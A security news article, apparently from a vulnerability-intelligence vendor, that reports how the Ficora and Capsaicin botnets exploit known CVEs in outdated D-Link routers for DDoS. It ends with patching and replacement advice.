Outdated D-Link Routers Targeted by Ficora and Capsaicin Botnets

December 29, 2024

Recent cyberattacks have seen two botnets, known as 'Ficora' and 'Capsaicin', exploiting outdated D-Link routers. These routers, some of which have reached their end-of-life, are popular among both individuals and organizations. The devices targeted include DIR-645, DIR-806, GO-RT-AC750, and DIR-845L. The botnets gain initial access to these devices through known vulnerabilities (CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, and CVE-2024-33112). Once a device is compromised, the attackers exploit weaknesses in D-Link’s management interface (HNAP) and carry out malicious commands through a GetDeviceSettings action. The botnets are capable of stealing data and executing shell scripts. It appears that the attackers primarily use the compromised devices for distributed denial-of-service (DDoS) attacks.

Ficora, which is an updated version of the Mirai botnet designed to exploit D-Link devices, has been observed in various locations, with a concentration in Japan and the United States. The botnet's activity, according to Fortinet's telemetry data, is random, with significant spikes in October and November. After gaining initial access to D-Link devices, Ficora uses a shell script named 'multi' to download and execute its payload through various methods like wget, curl, ftpget, and tftp. The malware comes with a built-in brute force component with hard-coded credentials to infect additional Linux-based devices across multiple hardware architectures. Its DDoS capabilities include UDP flooding, TCP flooding, and DNS amplification to maximize the impact of its attacks.

Capsaicin, on the other hand, is a variant of the Kaiten botnet, believed to be developed by the Keksec group, which is known for 'EnemyBot' and other malware families targeting Linux devices. Fortinet observed a burst of Capsaicin activity between October 21 and 22, primarily targeting East Asian countries. The infection process involves a downloader script ('bins.sh'), which fetches binaries with the prefix 'yakuza' for different architectures, including arm, mips, sparc, and x86. The malware actively seeks and disables other botnet payloads active on the same host. In addition to its DDoS capabilities, which are similar to those of Ficora, Capsaicin can also gather host information and send it to the command and control (C2) server for tracking.

To protect routers and IoT devices from botnet malware infections, it is recommended to keep them updated with the latest firmware version, which should address known vulnerabilities. If a device has reached end-of-life and no longer receives security updates, it should be replaced with a new model. As a general rule, default admin credentials should be replaced with unique and strong passwords, and remote access interfaces should be disabled if not necessary.

Related News

Latest News

Like what you see?

Get a digest of headlines, vulnerabilities, risk context, and more delivered to your inbox.

Subscribe Below

By submitting this form, you’re giving us permission to email you. You may unsubscribe at any time.

Accelerate Security Teams

Continuously identify and prioritize the risks that are most critical in your environment, and validate that your remediation efforts are reducing risk. An always-on single source-of-truth of your assets, services, and vulnerabilities.